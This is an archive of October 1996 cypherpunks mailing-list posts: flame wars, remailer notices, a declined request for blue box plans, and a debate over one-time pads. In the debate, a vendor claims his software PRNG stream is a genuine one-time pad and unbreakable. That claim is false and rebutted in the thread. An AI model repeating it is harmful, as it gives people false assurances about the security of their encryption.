      Nothing can stop good people from doing what is right (as opposed to 
making them do wrong, which is a different matter), and nothing will stop 
bad people from doing wrong.

     That last was important, so I'll repeat it. Nothing will stop bad 
people from doing wrong. Nothing. They will take advantage of any system that
you put in place. Can't be helped, any more than you can stop a hurricane, 
an earthquake, or a dog from marking his territory. It is simply their nature. 

     The idea is to minimize the danger to the good people. If you have to 
put systems into place, make them as simple and unobtrusive as they need to
be. Make them as fool proof as possible. These two requirements mean that 
you need to keep people out of the system as much as possible. People complicate
things. People (most) are foolish. 

     The court system is a prime example of this. The mission of the courts 
is simple, seperate the guilty from the not guilty (there are no innocents,
at least not enough to worry about). People get involved, and what do you have?
a system where it takes _teams_ of people on both sides to argue "guilt" or 
"innocence" based on arcane bits of obscure rules and traditions. Once
guilt or not-guilt has been established, and this is in a case where there
is a binary (1 or not 1) outcome is possible. 
	
      Constitutional law seems to be a much bigger gamble, and I personally
have no doubt that politics plays a HUGE part in their descesions. 

     Cypherpunks are supposed to write code, they are supposed to deploy 
code, and they are supposed to promote the writing, use, and deploying 
of code. 

     Unfortunately I can't write code. I've tried, and my mind doesn't work 
that way. I do what I can to talk about crypto, security, and privacy issues,
to get other people to think about these things, and to get the code deployed. 

     Technology cannot (yet) be good or bad. It isn't like people, it has 
no intentionality, no motives, no dreams, or beliefs, it simply is. People 
are not to be trusted, and this includes the supremes.
 
Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@fatmans.demon.co.uk
Date: Mon, 21 Oct 1996 08:31:15 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: OTP
Message-ID: <845910392.8251.0@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



> Can you explain to me how your one time pad algorithm is any better than
> encryption something with, say, RC4 or any other cipher using a key that
> is the same length as the seed for your PRNG?

Well for a start there is no possible cryptanalytic (rather than 
brute force) attack on a one time pad, the system can be 
mathematically proven to be secure with a very simple bit of 
statistics.

Soemthing like RC4, even if the key were totally random and 
unpredictable, and had as much, or more state than the message can 
still be cryptanalysed possibly, although it is unlikely...

 

  Datacomms Technologies web authoring and data security
       Paul Bradley, Paul@fatmans.demon.co.uk
  Paul@crypto.uk.eu.org, Paul@cryptography.uk.eu.org    
       Http://www.cryptography.home.ml.org/
      Email for PGP public key, ID: 5BBFAEB1
     "Don`t forget to mount a scratch monkey"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 20 Oct 1996 15:40:39 -0700 (PDT)
To: cypherpunks@toad.com
Subject: ANother Timmy May clone
In-Reply-To: <3269375D.469A@tricryption.com>
Message-ID: <67B5VD20w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Timmy-May-style pseudo-crypto:

>From: Edgar Stahley <EStahley@tricryption.com>
>Newsgroups: comp.security.misc
>Subject: Finally, an easy Encryption System
>Message-ID: <3269375D.469A@tricryption.com>
>Date: Sat, 19 Oct 1996 16:17:33 -0400
>Organization: Tricryption
>Lines: 14
>NNTP-Posting-Host: u029.comcat.com
>Mime-Version: 1.0
>Content-Type: text/plain; charset=us-ascii
>Content-Transfer-Encoding: 7bit
>
>What if an encryption program was really easy to use?
>
>What if you could send important documents securely over the
>internet without having to enter any keys at all?
>
>What if this was possible because you and your group of
>recipients could be the only ones in the world having access to
>your very own customized encryption system?
>
>What if there was a $2000 contest to check it out?
>
>  * (R)            Edgar Stahley     ES@tricryption.com
>* TRICRYPTION - IBM file encryption.   Fax/Phone: (215) 453-1452
>  *                Web site: http://www.tricryption.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cypher@cyberstation.net
Date: Sun, 20 Oct 1996 16:27:58 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Q.E.D. reply to Perry Metzger
Message-ID: <Pine.BSI.3.95.961020182431.28634A-100000@citrine.cyberstation.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> IPG Sales writes:
> >          Some of you have sardonically written to say "Nihil Est
> >          Demonstrandum," N.E.D. because an OTP must be derived from a
> >          hardware source, that is, it must be a pure random sequence
> >          of limitless entropy. Accordingly, they unbashfully assert
> >          that an OTP generated by a computer program is not possible.
> > 
> >          How do they know that? Does the Bible tell them so, or the
> >          Koran, or do they get it from the Torah? Why not cite the
> >          source of their certainty instead of advancing an unsupported
> >          proposition.
> 
> See Claude Shannon's papers on information theory. [Available as: C.E.
> Shannon, Collected Papers: Claude Elmwood Shannon, N.J.A. Sloane and
> A.D. Wyner, eds., New York: IEEE Press, 1993.]
> 
> Shannon invented information theory in 1948 and 1949. Part of his
> papers discuss the information theory of cryptosystems. He
> mathematically proved that only a O.T.P.. using non-reused physically
> random numbers could provide what he termed "perfect secrecy".  I
> accept mathematical proofs above the Koran or the Bible. (The Torah is
> a subset of the Bible.)

As in so many other cases, you are so F.O.S. that it is
unbelievable. Your eminence pontificating about it does make
it true. Furthermore, Shannon certainly did not prove that
physically random numbers are required to provide what he termed "perfect
security." I believe that closer reading and interpretation will reveal
that what he was saying was that any mathematical series other than truly
random numbers can theoretically be reconstructed by some means, including
brute force, should that be required.  Obviously that is true.

I do not disagree with the fact that brute force can be used to
attack the algorithm that I have advanced. It you try all of the
possible OTPs, PRNG encryptor streams, against the ciphertext, then only
a limited few and maybe only one meaningful plain text can be obtained.
There is absolutely no dispute about that. Accordingly, Shannon
is quite correct in saying that it is not "perfect." It is not perfect in
a mathematical sense, and in that limited sense only, you are correct.
However to try all possibilities, is mathematically impossible - thus the
algorithm must be attacked analytically - as EVEN you, or anyone else,
will be able to clearly see, if you examine the algorithm, it cannot be
attacked analytically. 

My algorithm most certainly does NOT produce a theoretical pure Random
Number Stream, accordingly it is a PRNG, but it most certainly does
produce an OTP that meets each and every requirement of such, other
than some theoretical definition that you seek to impose on it by your
dogmatic words. You do not have to take my word for it, the FULL
ALGORITHM, which has never before been published, is set out on our web
site.  

There is no mathematical proof that my PRNG streams are not an OTP -
because they are OTPs. There are 156.8816 megabytes of raw encryptor
stream data at our site. They constitute 10 OTPs, all using the same key,
only the message numbers vary.but with different message numbers only.
> >          I do not mean to be rude,
> 
> You are anyway.
> 
You are so vane, so crass, so dogmatic, so blinded by your opinions,
that you obviously look at yourself in the mirror wheneever given the
opportunity. You do niot know what the hell you are constantly
pontificating about. talking aboutand including the one under discussion
herein. Why not show everyone your prowess by telling us what the key and
the As, Bs, and Cs, are they were used to generate the 156.8816 megabytes
referred to above. Of course, you cannot, so you bray like an ass to cover
up your crypto impotence.

> >          but excuse me, what
> >          scientific proof can they offer for that immovable avowal?
> 
> See above.
  See above
> 
> >          There is no scientific proof whatsoever, none at all,
> 
> See above.
 See above
> 
> >          except
> >          for the words and their steadfast, and maybe self serving,
> >          postulate.
> 
> See avove.
See above and below
> 
> >          Accordingly, obviously it is they, not us, who are
> >          the ones that have "Nihil Est Demonstrandum," in this matter.
> 
> See above.
See above
> 
> >          There is not one scintilla of sustainable evidence to support
> >          such a doctrine.
> 
> See above.
See above and below.
> 
> >          While the vast majority of people knowledgeable about
> >          cryptography have not heretofore believed that it is possible
> >          for software to produce an OTP,
> 
> It is not possible. 
It is absolutely possible, Q.E.D.

> 
> The information content, or entropy, of the key stream is necessarily
> no larger than its keyspace. That is, if you have a software
> pseudo-random number generator using an N bit seed, the entropy of the
> keyspace is necessarily never greater than N. This is mathematically
> certain -- no amount of prayer on your part can change that.
> 
> >          that does not make it a
> >          scientific fact,
More of your meaningless B.S. - Obviously you wrote your reply before
you read my entire message.

> 
> Sorry, its even better -- a MATHEMATICAL fact.
> 
You saying it, like a lot of other supercilious crap that oozes out of
you brain as "write bites," does not make it so. All kinds of crap is
running loose up there, you need to get it under control someway. 

It is absolutely not perfect in the Shannon sense, but it does not have to
be theoretically perfect to fulfill the requirement of being an OTP. You
definition of an OTP, or a OTP as you mistakenly refer to it, is an
extraneous mathematical definition that people have mistakenly
extrapolated from Shannon.   

> >          In support of their position, some have pointed out that John
> >          von Neumann, to paraphrase, stated that ARITHMETIC cannot
> >          produce random numbers,
> 
> von Neumann meant any deterministic algorithm, actually.
>
There you go again, pulling things out of you crazy hat, head, running
off at the brain again, stating a falsehood and hoping that people will
overlook it. I assume that you held a seance with von Neumann and he told
you that from the great beyond, since that is clearly not what he said. A
careful reading of von Neumann does not reveal that he said one thing and
meant another. He used the word ARITHMETIC, if he meant something else he
world have said so. Furthermore, he was referring random numbers, and to
repeat emphatically, my algorithm is a PRNG, but  it  also happens to be
an OTP, as we can prove. Q.E.D.    
 
> >          We stipulate the obvious fact that the encryptor stream
> >          generated by EUREKA is a PRNG stream, though we do consider
> >          it gross denigration to castigate it as ONLY a PRNG stream.
> 
> If it is a PRNG, you do not have a One Time Pad, period. What you have
> is a stream cipher.
>
It is a stream cipher, but it is also an OTP, just as a hardware sourced
RNG is a stream cipher that is also an OTP.

> 
> Furthermore, past examination has shown you have a POOR stream cipher.
> 
Did you see the movie, Dumb and Dumber - you are obviously getting dumber
and dumber and dumber - would I have come back to you 5 months later with
the same thing - you are obviously brain dead - as I have stated on
numerous occasions, the previous proffer was only a part of the overall
algorithm, to solicit help from some of the cypherpunks, which I did get. 
The so
called breaking with "Known Plain Text," was an absolute farce, it
would have applied to only one message where it could be applied, if at
all - it did not apply to the whole system, each OTP was, and is
completely different - but that is beside the point, we did make some
changes to negate other possible attacks, but those were modest changes.
Any one that looks at the algorithm, which obviously, as a self proclaimed
crypto Diety, you have not deign to do, can determine that it is in now
way what you have looked at before.
 


> >          It is a PRNG issue that also happens to be an extremely well
> >          behaved OTP sequence, with limited but ample entropy, as well.
> 
> If the entropy is limited, you do not have a One Time Pad, period, end
> of discussion, its over.
> 
You say that Shannon, or you, or someone can prove that
mathematically, so let's see someone do it. 156.8816 megabytes of raw
encryptor stream output should be enough to work with - if you need more,
I can provide same.   I agree  that theoretically it can be broken by
brute force but that is patently impossible as you can quickly discern if
you examine the algorithm and try it, instead of salivating your
mouth off with baseless blabber. Obviously, my algorithm does not produce
a pure random stream. I agree with Shannon that it is not "perfect,"
but it most certainly is perfect enough to meet any and all practical
requirements, now and forever. 

> >          It meets each and every criteria rationally established for an
> >          OTP in all reasonable aspects.
> 
> Set by WHOM? By you? Your criteria bear no resemblance to those
> accepted in general. Are you one of those people who sells someone a
> loaf of bread and says "this is an automobile, by every criterion I
> have set for automobiles"?
> 
There you go again, strutting about and spreading your pretentious turkey
droppings, manure,  all over the place. 

As you know, I headed the OTP group at NSA, and while there I conceived and
implemented, under the direction of Abraham Sinkov, Dottie Bloome, Leon
O'mera and William J. Cherry, LONE STAR, the Library of ONe time pad
Encryption Statistical Analysis Routines. I was responsible for the
generation and computer analysis of OTPs at NSA. I have worked on
thousands of OTPs, both in the generation of, and comprehensive analysis
of same, including looking for repetitive usage of the same OTP, including
direct as well as nth degree derivatives, over the last 40 years, at NSA
and at Mauchly-Wood. I make no claim that I am the world's greatest OTP
authority, or even an authority on them like you obviously THINK you are,
but I think that I have more than a little knowledge about the subject of
OTPs.

That brings up something that utterly fascinates me. Which is your
frequent oblique writings about VERONA, or is it VENONA, or maybe it is
VERONICA, or maybe even VERONIKA - anyway you know what I mean. Would you
be so kind as to enlighten me, us, about that subject - I would like to
finally find out what really happened from an authoritative source. How
were we able to break some of those messages. Please help me, us, out with
details instead of blabber. 

For those who have not seen my resume', it together with dozens and
dozens of references, many of whom are well known, and some of whom you
may know, is posted on our web site, but obviously that does not prove
anything, except to provide a point of reference. 

The point is that we have disclosed the complete algorithm, for the first
time at the web site, so let's see someone provide us with the key or the
ABCs. Our server is downloading an enormous number of the
algorithms/data/statistical tests, over 1,000 so far, so we assume
someone is testing it and evaluating it. 

And for you to claim that my contention is analogous to comparing bread
to an automobile, petty nonsense and mindless hyperbole. 

> >          Think about that simple supposition for a moment. What do we
> >          mean by an OTP?
> 
> Something different from what everyone else means, so it makes no
> difference. 

Obviously something different from what YOU, and most others,
mistakenly think it means. It is not some esoteric, theoretical
mathematical meaning that has no relation to our real world. It is a tool
to encrypt and decrypt messages with, it is not a mathematical formula. If
you say that a random number sequence is not generated, I agree. If
however, you go on and add that, "thus by definition it is not an OTP,"
then that is patently and absolutely a false statement, though subscribed
to by most of the cryptography community. You are a mix-master
stirring up cryptography and IT, and you simply cannot homogenize
them into a fully blended mix.  

I assert that an OTP is a tool used for encryption which by definition,
can never be used again, and which consists of a sequence of bits which
can not be derived by any POSSIBLE, not theoretical but POSSIBLE, means.
Granted, our stream could theoretically be derived by trying all of the
possible 10^34322 keys/table values, but that is theory, it is absolutely
clear that there is no way to try all the possibilities, or even the first
800 bits of an encryptor stream. Any relatively informed mathematician
can quickly discern that there is no analytical attack that can be made
against the stream, it is that simple,  as readers/evaluators will find.

If the only method of cracking the system is by brute force, and that is
impossible, then it is absolutely an OTP for encryption and decryption
purposes, which is its purpose - it is not something to define in IT
writings. Our algorithm is absolutely not perfect in the theoretical
sense but it is PERFECT as far as the ability to determine the underlying
plain text is concern.

> 
> >          Not only that, but you can prove it to yourself, Q.E.D.  We
> >          maintain that it is discernible to any knowledgeable person
> >          who probes the algorithm, that the only analytical tack that
> >          can be mounted against EUREKA is brute force and that is
> >          patently impossible.. One of your Cpunk colleagues says he
> >          uses Triple DES, 168 bits, and he does not believe that it
> >          can be brute forced - I agree, 3-DES, 10^50+ possibilities,
> >          cannot be brute forced now, or in the foreseeable future -
> >          then what about the EUREKA's 10^34322 possibilities,
> >          10^34271+ greater than 3-DES? No way, not now, not ever.
> >          Furthermore, EUREKA is an order, or more, magnitude faster
> >          than triple DES, easier to use, much more secure, etal.
> 
> I believe that we have already established that your cipher is easy to
> crack, so your claims that it is hard to crack really don't matter.
> 
> Perry
> 

To repeat, we have made some a changes, and for the first time disclosed, 
detailed, the FULL ALGORITHM  at great length at our web site. The reason
that you do not want to argue that is obviously because you are absolutely
impotent in that regard and you are unable to dispute facts, so you
blindly conjure up some witches brew of words and think that people will
never know the difference. To paraphrase John Dean, the truth will always
come out and your ass braying will never stop that truth. 
 
Don Wood,





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 20 Oct 1996 19:14:24 -0700 (PDT)
To: h2@juno.com (Michael B Amoruso)
Subject: Re: Blue Box Plans & hacker bbs's
Message-ID: <199610210213.TAA28765@dfw-ix5.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:09 PM 10/20/96 EDT, you wrote:
>I know this is my second question in a short period of time...but anyone
>got or know where to get any good blue box plans??  I cant find shit on
>the web, and I need some good hacker telnet bbs's.  Someone please give
>me either.

goto alt.2600.  Around here we generally can afford
to pay our phone bills :-)  

Also, the network's signalling has changed, and the basic 
Captain Crunch Whistle doesn't work many places any more -
most of the signalling is digital out-of-band rather than
inband audio.  Phreaking isn't impossible (or there wouldn't be 
as many people chasing the Dread Pirate Mitnick), but at this point
you actually need to know what you're doing to succeed at it,
and merely having plans for a device you don't know well enough to
emulate in code on your PC isn't going to buy you much.

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# You can get PGP outside the US at ftp.ox.ac.uk
  Imagine if three million people voted for somebody they _knew_,
  and the politicians had to count them all.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@cs.berkeley.edu>
Date: Sun, 20 Oct 1996 19:16:20 -0700 (PDT)
To: cypherpunks@toad.com
Subject: AOL/remailer testing
Message-ID: <326ADCE9.7D2FB892@cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


Hi cypherpunks,

   It has come to my attention that there may be problems sending mail
from the anonymous remailers to AOL accounts. I'd like a volunteer with
an AOL address to recieve a test messages sent by me, and report back to
me which mails got through and which didn't.

   Thanks very much in advance.

Raph Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 22 Oct 1996 01:04:44 -0700 (PDT)
To: cypherpunks@toad.com
Subject: ANother Timmy May clone
Message-ID: <$m2n12232-.67B5VD20w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Timmy-May-style pseudo-crypto:

>From: Edgar Stahley <EStahley@tricryption.com>
>Newsgroups: comp.security.misc
>Subject: Finally, an easy Encryption System
>Message-ID: <3269375D.469A@tricryption.com>
>Date: Sat, 19 Oct 1996 16:17:33 -0400
>Organization: Tricryption
>Lines: 14
>NNTP-Posting-Host: u029.comcat.com
>Mime-Version: 1.0
>Content-Type: text/plain; charset=us-ascii
>Content-Transfer-Encoding: 7bit
>
>What if an encryption program was really easy to use?
>
>What if you could send important documents securely over the
>internet without having to enter any keys at all?
>
>What if this was possible because you and your group of
>recipients could be the only ones in the world having access to
>your very own customized encryption system?
>
>What if there was a $2000 contest to check it out?
>
>  * (R)            Edgar Stahley     ES@tricryption.com
>* TRICRYPTION - IBM file encryption.   Fax/Phone: (215) 453-1452
>  *                Web site: http://www.tricryption.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Sun, 20 Oct 1996 16:41:48 -0700 (PDT)
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: [SERDAR ARGIC] Vulis's role in the spamming of 2,500,000 , cypherpunks
In-Reply-To: <HDq2VD6w165w@bwalk.dm.com>
Message-ID: <Pine.SUN.3.91.961020193835.6991A-100000@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 19 Oct 1996, Dr.Dimitri Vulis KOTM wrote:

> Ray Arachelian <sunder@brainlink.com> writes:
> 
> > Vulis, grow up.
> >
> > =============================================================================
> >  + ^ + |  Ray Arachelian    |FL|       KAOS KERAUNOS KYBERNETOS      |==/|\==
> >   \|/  |sunder@brainlink.com|UL|__Nothing_is_true,_all_is_permitted!_|=/\|/\=
> > <--+-->| ------------------ |CG|What part of 'Congress shall make no |=\/|\/=
> >   /|\  | "A toast to Odin,  |KA| law abridging the freedom of speech'|==\|/==
> >  + v + |God of screwdrivers"|AK|        do you not understand?       |=======
> > ===================http://www.brainlink.COM/~sunder/=========================
> >       If the Macintosh is a woman...  Then Windows is a Transvestite!
> >            ActiveX! ActiveX! Format Hard drive? Just say yes!
> 
> My friend and colleague, Dr. Serdar Argic, has cited the following sources
> in reference to Ray Arachelian's criminal dandruff-covered grandparents:

<48kb Spam message deleted.>

The friend and colleague of your whom you know says much about you. Yet
another Net Loon. You action of posting a 48K spam to this list in attempt
to get me upset has resulted in a single, half-felt yawn.  Others may be 
pissed at your attempt at spamming me.  I give not a shit.

My original message to you stands: Vulis, grow up.

=============================================================================
 + ^ + |  Ray Arachelian    |FL|       KAOS KERAUNOS KYBERNETOS      |==/|\==
  \|/  |sunder@brainlink.com|UL|__Nothing_is_true,_all_is_permitted!_|=/\|/\=
<--+-->| ------------------ |CG|What part of 'Congress shall make no |=\/|\/=
  /|\  | "A toast to Odin,  |KA| law abridging the freedom of speech'|==\|/==
 + v + |God of screwdrivers"|AK|        do you not understand?       |=======
===================http://www.brainlink.COM/~sunder/=========================
      If the Macintosh is a woman...  Then Windows is a Transvestite!
           ActiveX! ActiveX! Format Hard drive? Just say yes!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Sun, 20 Oct 1996 16:43:44 -0700 (PDT)
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: YES OR NO?
In-Reply-To: <FL2yVD29w165w@bwalk.dm.com>
Message-ID: <Pine.SUN.3.91.961020194413.6991B-100000@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 17 Oct 1996, Dr.Dimitri Vulis KOTM wrote:

> Sandy Sandfort <sandfort@crl.com> writes:
> 
> > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> >                           SANDY SANDFORT
> >  . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
> >
> > C'punks,
> >
> > On Thu, 17 Oct 1996, Dr.Dimitri Vulis KOTM wrote:
> >
> > > I said: YES, when I have the time.
> >
> > Great.  So let's pick a date sufficiently in the future that you
> > can make a firm commitment.  For starters, our three winter
> > meetings are tentatively scheduled for December 14, January 11
> > and February 8.  Any of those sound good to you?
> 
> Don't know yet.

"Translation: I'm too chicken to say yes, but don't want to look like a 
chicken by saying no, so I'll delay this as far as I can.  Meanwhile, 
I'll spam those who point this out with 48kb spam messages of pure 
bullshit and pretend that their ancestors are responsible for said 
actions in bullshit spam message."

Vulis, get some balls.  You lack them.

=============================================================================
 + ^ + |  Ray Arachelian    |FL|       KAOS KERAUNOS KYBERNETOS      |==/|\==
  \|/  |sunder@brainlink.com|UL|__Nothing_is_true,_all_is_permitted!_|=/\|/\=
<--+-->| ------------------ |CG|What part of 'Congress shall make no |=\/|\/=
  /|\  | "A toast to Odin,  |KA| law abridging the freedom of speech'|==\|/==
 + v + |God of screwdrivers"|AK|        do you not understand?       |=======
===================http://www.brainlink.COM/~sunder/=========================
      If the Macintosh is a woman...  Then Windows is a Transvestite!
           ActiveX! ActiveX! Format Hard drive? Just say yes!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Sun, 20 Oct 1996 18:14:04 -0700 (PDT)
To: Steve Schear <azur@netcom.com>
Subject: Re: Usenet and Re: extortion via digital cash
In-Reply-To: <v02130501ae8fd17fd691@[10.0.2.15]>
Message-ID: <Pine.BSF.3.91.961020200445.10676A-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> In the U.S., at least, attempts to enforce identification of Internet users
> or anonymous posters to newgroups and such are likely to meet with stiff
> legal resistance.  The Supreme Court has ruled that anonymous use of
> protected speech (e.g., political handbills) must be permitted.
> 

Unless you are in Georgia.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: h2@juno.com (Michael B Amoruso)
Date: Sun, 20 Oct 1996 17:10:02 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Blue Box Plans & hacker bbs's
Message-ID: <19961020.200347.3302.1.h2@juno.com>
MIME-Version: 1.0
Content-Type: text/plain


I know this is my second question in a short period of time...but anyone
got or know where to get any good blue box plans??  I cant find shit on
the web, and I need some good hacker telnet bbs's.  Someone please give
me either.
					THanks
					HeLiUM




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 20 Oct 1996 18:40:24 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Timmy May's trash
In-Reply-To: <01BBBE6A.CB385CA0@king1-04.cnw.com>
Message-ID: <2DJ5VD22w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


> 	 "Look, see how cleverly I put words of
> 	 comparison and degradation in conjunction
> 	 with a person's name?   Wow  -
> 	 Am I impressive, or what?"

Sounds like a crontab job, or Timmy May, or both.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Anonymous)
Date: Sun, 20 Oct 1996 12:14:15 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: unsibscribe?
Message-ID: <199610201913.VAA03493@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Anonymous wrote:
> "Alexander.Kvache" <alexk@hcl.com> sent the new word:
> >
> >unsibscribe
> 
> to the list. I am pretty sure we have seen them all, now.
> 
> OBcrypto - are these spellings randomly generated?

Naw, it's a new stego method... ;-)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: =?ISO-8859-1?Q?J=FCri_Kaljundi?= <jk@stallion.ee>
Date: Sun, 20 Oct 1996 11:23:21 -0700 (PDT)
To: cypherpunks@toad.com
Subject: FWZ1 encryption algorithm
Message-ID: <Pine.GSO.3.93.961020211949.10836B-100000@nebula>
MIME-Version: 1.0
Content-Type: text/plain



Is there any data available on FWZ1 encryption algorithm? This is used in
CheckPoint FireWall-1 product for securing virtual private networks. As it
is exportable from US, it must be pretty weak, but even considering that I
would like to know how it exactly works.

JK - jk@stallion.ee





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Kenney <saken@chardos.connix.com>
Date: Sun, 20 Oct 1996 18:49:13 -0700 (PDT)
To: remailer-operators@c2.org (remailer operators)
Subject: amnesia@chardos.connix.com DOWN
Message-ID: <199610210123.VAA17434@chardos.connix.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Effective immediately <amnesia@chardos.connix.com> is DOWN. I was
requested to terminate remailer service by my ISP, which has received
numerous complaints recently (from people who obviously don't have the
ability to read the headers correctly), and finally had enough. 

The acquisition of my own domain name should alleviate any future
objections, but this will have to wait till after the 1st of the year :(

For the next 10-15 days I will manually process any mail destined for
nymservers or just passing through to other remailers.

Scott Kenney
<saken@chardos.connix.com>
<amnesia+admin@chardos.connix.com>

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMmrP75QgY7wl3Gh1AQFqcAQA3W86FvrThZ7kYiKxJxf2GMZlDm+OIczo
fe27kSLtW6xpWegl95FGBYhLnf/PUWIpziUblGaY7lfvn7WfXQ2pOMapOWO5Uq/j
5iIiHf3cQogMeFeUp3clD10zfvkV698mdl22dj12BXQbxOcxJBvv9Tu++bzAuJZm
c6QErMfwghI=
=y24d
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cypher@cyberstation.net
Date: Sun, 20 Oct 1996 19:26:52 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Apologies and Clarifications -
Message-ID: <Pine.BSI.3.95.961020212550.5644A-100000@citrine.cyberstation.net>
MIME-Version: 1.0
Content-Type: text/plain



First of all, I would like to sincerely apologize for my personal attacks
on Perry. It is the first time that I have ever done that and I apologize
for wasting you time and mine in that regard. He is obviously going to try
to pontificate and rehash the old forever. Accordingly, to paraphrase
Chief Joseph, "from where the sun now sits, I will fight Perry Metzger
no more, forever." I further apologize for any offense that you feel that
I may have caused.

As to other matters:

         Instead of replying to the attacks being fabricated 
         by Perry and other I have opted to recapitulate the matter
         at hand as perspicaciously as my limited abilities permit.

         As we know, Shannon was not a prolific writer. We also know
         that IT has not advanced very far during the 50 years since
         Shannon's nascent ground breaking work. Why? Because of the
         very issues that are at the heart of this matter. The
         differences between black, white and all the multitude hues
         of grey in between. I am extremely skeptical, and believe
         many readers may be too, of people that go around flaunting
         their understanding of Shannon, entropy and its application in
         absolute unequivocal mathematical terms. I hold that such a
         position, except in terms of delimiters, does not reflect an
         understanding of Shannon's impartations but au contraire, it
         is evidential proof that they  do not have any real
         appreciation of Shannon at all.  That is in no way intended
         to denigrate Shannon's very important contribution to our
         endeavors.

         I embrace the predicate that Shannon in terms of mathematical
         certainty has only defined the boundary conditions of the
         playing field within which we must play our games. If we
         stray outside that field, we are errant in the absolute
         sense. If we however play within those mathematical certain
         boundaries, we may be in error for other reasons, but Shannon
         cannot be cited as the casual agent.

         The recondite "parti pris" hijacking of the definition of the
         term OTP on the basis of conflict with  Shannon is ludicrous,
         when such usage is apodictically within Shannon's delimiters.
         I have witnessed several definitions of an OTP which I
         maintain are entirely consistent with Shannon. Among such
         are: An encryption where any ciphertext may in fact be an
         an encrypted expression of any plaintext of the same or
         lesser length; or an encryption where the only information
         obtainable from the ciphertext is the maximum plaintext
         length; and so forth. All of these definitions have the
         essential quality that at the bit level, they can be reduced
         down to the equation:

                 Pb xor  Ub = Cb

         where Pb is a Plaintext bit, Ub is an Unknown bit and Cb is
         the resultant Ciphertext bit. Of course the combining form is
         normally XOR, but could be table lookup, modulo additive, or
         other. The important thing is that so long as only Cb is
         known, it is impossible to determine either Pb or Ub.

         If somehow the Ubs can be subtracted or cancelled out, as for
         instance by any discoverable reusage of Ub, even in a
         derivative form, then you may be able to recover some or all
         of the Pbs.

         The assertion that an Ub must be an Rb, a truly Random bit,
         is irrelevant ideology unless there exists the means to
         convert the Unknown bit, Ub, into a Known bit, Kb.

         That is the sublime basis of the IPG algorithm, which is to
         generate a stream of "unknown bits" which cannot be
         analytically reconstituted in the absence of the OTP
         generator key, and possibly other related key like
         parameters. The additional caveat of course is that the key
         cannot be guessed, nor can it be derived from brute force
         methodologies, both of which are patently impossible with the
         IPG algorithm. You do not have to be a Stephen Hawking to
         comprehend why that is a fact; each of you, with possible
         minor exceptions, will be able to discern that because it
         quickly becomes self evident as you ply the algorithm.

         There are those who will advance the contention that the
         ciphertext cannot in fact represent any possible plain text.
         That is incontestably true. In fact with reasonably long
         ciphertexts, say for example an encrypted FAX, unlike a
         hardware sourced OTP, there will only be one meaningful plain
         text that can be derived from the resultant ciphertext.

         Does that mean that a given ciphertext might not represent
         any plain text of that same, or lesser, length? One would
         think so, since it obviously cannot. The problem being
         though, is exactly how do you go about proving that any given
         plain text cannot be represented by a known ciphertext. There
         are two prongs to such a proof, both of which must be
         substantiated in any specific case at hand:.


         1. Inclusionary Proof - the one most frequently advanced
            alone, which simply stated says that since each encryptor
            stream may represent any possible encryptor stream of
            that same length, then the ciphertext may be the XOR
            product of any plaintext of same said length.  Obviously,
            a hardware sourced OTP DOES meet that proof.  Also. it is
            patently evident that the IPG software OTP DOES NOT meet
